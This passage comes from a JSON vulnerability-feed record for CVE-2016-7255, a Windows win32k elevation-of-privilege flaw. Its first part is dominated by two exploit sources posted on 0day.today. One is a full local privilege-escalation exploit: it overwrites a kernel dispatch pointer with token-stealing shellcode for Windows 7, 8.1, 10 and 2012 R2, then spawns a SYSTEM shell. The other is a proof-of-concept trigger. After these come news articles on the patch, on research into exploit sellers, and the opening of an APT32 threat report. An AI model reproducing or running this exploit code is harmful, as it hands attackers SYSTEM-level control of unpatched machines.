= create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n \r\n printf(\"HAL address: %llx\\n\", hal_heap);\r\n // 0xffffffffffd00d50 this is a good offset to store shellcode \r\n // 0xfff - 0xd50 = 0x2af space\r\n \r\n memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n return 0xffffffffffd00d50;\r\n}\r\n \r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n \r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n \r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n \r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n \r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n \r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n \r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n \r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n \r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n \r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n \r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n \r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n \r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\nint __cdecl main(int argc, char** argv)\r\n{\r\n TCHAR pre_username[256];\r\n TCHAR post_username[256];\r\n DWORD size = 256;\r\n ULONG Interval = 0;\r\n HMODULE hNtDll = NULL;\r\n UINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n int osversion;\r\n \r\n if (argc != 2) {\r\n printf(\"Please enter an OS version\\n\");\r\n printf(\"The following OS'es are supported:\\n\");\r\n printf(\"\\t[*] 7 - Windows 7\\n\");\r\n printf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n printf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n printf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n printf(\"\\n\");\r\n printf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n return -1;\r\n }\r\n \r\n osversion = _strtoui64(argv[1], NULL, 10);\r\n \r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; // QueryIntervalProfile \r\n }\r\n else if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n printf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n printf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n printf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n printf(\"Current Username: %s\\n\", pre_username);\r\n printf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n printf(\"Enter to continue...\\n\");\r\n getchar();\r\n \r\n do\r\n {\r\n or_address_value_4((void*)PML4_SELF_REF);\r\n } while (FALSE);\r\n \r\n PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n printf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n \r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n \r\n printf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n DWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n char *p = shellcode;\r\n p += 4; // skip the CLI, PUSHF and MOV RAX bytes \r\n *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n \r\n p += 12; // Patch shellcode with original value in the Overwrite address\r\n *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n \r\n p += 12; // To patch the PID of our process\r\n \r\n *(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n printf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n \r\n if (osversion == 7){\r\n // Exploit Win7.1\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile) {\r\n printf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n } \r\n NtQueryIntervalProfile(0x1337, &Interval);\r\n }\r\n \r\n \r\n while (1) {\r\n size = 256;\r\n GetUserName(post_username, &size);\r\n if (memcmp(post_username, pre_username, 256) != 0) break;\r\n }\r\n Sleep(2000);\r\n system(\"cmd.exe\");\r\n \r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26645"}, {"lastseen": "2018-01-03T09:00:04", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://0day.today/exploit/description/26297", "id": "1337DAY-ID-26297", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\nFull Proof of Concept:\r\n \r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n \r\n********************************************************************\r\n Created: 2016-11-09 14:23:09\r\n Filename: main.c\r\n Author: root[at]TinySec.net\r\n Version 0.0.0.1\r\n Purpose: poc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n \r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n \r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n \r\n va_start(VaList,Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n \r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n \r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild , GetDesktopWindow() );\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild , TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n \r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n \r\n return 0;\r\n}\r\n \r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do\r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26297", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:01", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "[](<https://1.bp.blogspot.com/-YHGy8IvdU5A/WCNWb0AOdHI/AAAAAAAAqLQ/ZFC2_5FuLBsj06QydsVi5k6oMzvGFz5vACLcB/s1600/microsoft-security-update.png>)\n\nMicrosoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical [Windows kernel vulnerability](<https://thehackernews.com/2016/10/google-windows-zero-day.html>) (CVE-2016-7255) that had yet to be patched. \n \nThe company [criticized Google's move](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>), claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers \"at potential risk.\" \n \nThe vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. \n \nSo, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. \n \nAccording to Microsoft's [security bulletin](<https://technet.microsoft.com/library/security/MS16-135>) released today, any hacker who tricked victims into running a \"specially-crafted application\" could successfully exploit the system bug and gain the ability to \"install programs; view, change, or delete data; or create new accounts with full user rights.\" \n \nOnce exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. \n \nRated as \"important,\" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. \n \n[Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) is the same group of hackers that has also been accused by the US Intelligence community of hacking the [Democratic National Committee](<https://thehackernews.com/2016/07/russia-dnc-email-hack.html>), Clinton Campaign Chair [John Podesta](<https://thehackernews.com/2016/10/wikileaks-clinton-leak.html>), and former Secretary of State Colin Powell, among others. \n \nBesides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. \n \nPatch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. \n \nSo, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.\n", "modified": "2016-11-09T17:12:11", "published": "2016-11-09T06:12:00", "id": "THN:F8BDC767F3D202913920E1C28D137377", "href": "https://thehackernews.com/2016/11/microsoft-windows-update.html", "type": "thn", "title": "Microsoft Patches Windows Zero-Day Flaw Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T11:44:40", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-0859"], "description": "[](<https://thehackernews.com/images/-VgCR2Fih8qA/X3bKP0yAofI/AAAAAAAA3Xk/2BjzswcnClsJubOJnK-h72WdkV--wVjvwCLcBGAsYHQ/s0/exploit-development.jpg>)\n\nWriting advanced malware for a threat actor requires different groups of people with diverse technical expertise to put them all together. But can the code leave enough clues to reveal the person behind it?\n\nTo this effect, cybersecurity researchers on Friday detailed a new methodology to identify exploit authors that use their unique characteristics as a fingerprint to track down other exploits developed by them.\n\nBy deploying this technique, the researchers were able to link 16 Windows local privilege escalation (LPE) exploits to two zero-day sellers \"Volodya\" (previously called \"BuggiCorp\") and \"PlayBit\" (or \"luxor2008\").\n\n\"Instead of focusing on an entire malware and hunting for new samples of the malware family or actor, we wanted to offer another perspective and decided to concentrate on these few functions that were written by an exploit developer,\" Check Point Research's [Itay Cohen and Eyal Itkin](<https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/>) noted.\n\n## Fingerprinting an Exploit Writer's Characteristics\n\nThe idea, in a nutshell, is to fingerprint an exploit for specific artifacts that can uniquely tie it to a developer. It could be in using hard-coded values, string names, or even how the code is organized and certain functions are implemented.\n\nCheck Point said their analysis began in response to a \"complicated attack\" against one of its customers when they encountered a 64-bit malware executable that exploited [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) to gain elevated privileges.\n\nNoticing the fact that the exploit and the malware were written by two different sets of people, the researchers used the binary's properties as a unique hunting signature to find at least 11 other exploits developed by the same developer named \"Volodya\" (or \"Volodimir\").\n\n[](<https://thehackernews.com/images/-8XQpJ6aaOXE/X3bJepUcWVI/AAAAAAAA3Xc/RKyut5eDU-EfRXvFOJBCku7GCiTWNXJwgCLcBGAsYHQ/s0/malware-1.jpg>)\n\n\"Finding a vulnerability, and reliably exploiting it, will most probably be done by specific teams or individuals who specialize in a particular role. The malware developers for their part don't really care how it works behind the scenes, they just want to integrate this [exploits] module and be done with it,\" the researchers said.\n\nInterestingly, Volodya \u2014 likely of Ukrainian origin \u2014 has been [previously linked](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/>) to selling Windows zero-days to cyberespionage groups and crimeware gangs for anywhere between $85,000 to $200,000.\n\nChief among them was an LPE exploit that leveraged a memory corruption in \"[NtUserSetWindowLongPtr](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra>)\" (CVE-2016-7255), which has been widely used by ransomware operators like GandCrab, Cerber, and [Magniber](<https://securelist.com/magnitude-exploit-kit-evolution/97436/>). It's now believed that Volodya [advertised this LPE zero-day](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/zero-day-auction-for-the-masses/>) on the Exploit.in cybercrime forum in May 2016.\n\nIn all, five zero-day and six one-day exploits were identified as developed by Volodya over a period of 2015-2019. Subsequently, the same technique was employed to identify five more LPE exploits from another exploit writer known as PlayBit.\n\n## An Extensive Clientele\n\nStating the exploit samples shared code level similarities to grant SYSTEM privileges to the desired process, the researchers said, \"both of our actors were very consistent in their respective exploitation routines, each sticking to their favorite way.\"\n\nWhat's more, Volodya also appears to have switched up his tactics during the intervening years, with the developer shifting from selling the exploits as embeddable source code in the malware to an external utility that accepts a specific API.\n\nBesides ransomware groups, Volodya has been found to cater to an extensive clientele, including the Ursnif banking trojan, and APT groups such as Turla, APT28, and Buhtrap.\n\n[](<https://thehackernews.com/images/-MNtIN_O8MUA/X3bJJ7ypHuI/AAAAAAAA3XU/cceh7GbuWRUA-YVEd84SYiMoxzAoPtLbwCLcBGAsYHQ/s0/malware.jpg>)\n\n\"The APT customers, Turla, APT28, and Buhtrap, are all commonly attributed to Russia and it is interesting to find that even these advanced groups purchase exploits instead of developing them in-house,\" Check Point observed in its analysis. \"This is another point which further strengthens our hypothesis that the written exploits can be treated as a separate and distinct part of the malware.\"\n\nWith cyberattacks expanding in scope, frequency, and magnitude, using an exploit developer's code signature as a means to track down bad actors could provide valuable insight into the black exploit market.\n\n\"When Check Point finds a vulnerability, we demonstrate its severity, report it to the appropriate vendor, and make sure it's patched, so it doesn't pose a threat,\" Cohen said. \"However, for individuals trading these exploits, it's a completely different story. For them, finding the vulnerability is just the beginning. They need to reliably exploit it on as many versions as possible, in order to monetize it to a customer's satisfaction.\"\n\n\"This research provides insight into how that is achieved, and the buyers in this market, which often include nation-state actors. We believe that this research methodology can be used to identify additional exploit writers.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-10-02T10:18:28", "published": "2020-10-02T09:59:00", "id": "THN:89E2A7A39CBD630AB15218875ED90D19", "href": "https://thehackernews.com/2020/10/exploit-development.html", "type": "thn", "title": "Researchers Fingerprint Exploit Developers Who Help Several Malware Authors", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-06-12T18:15:32", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology 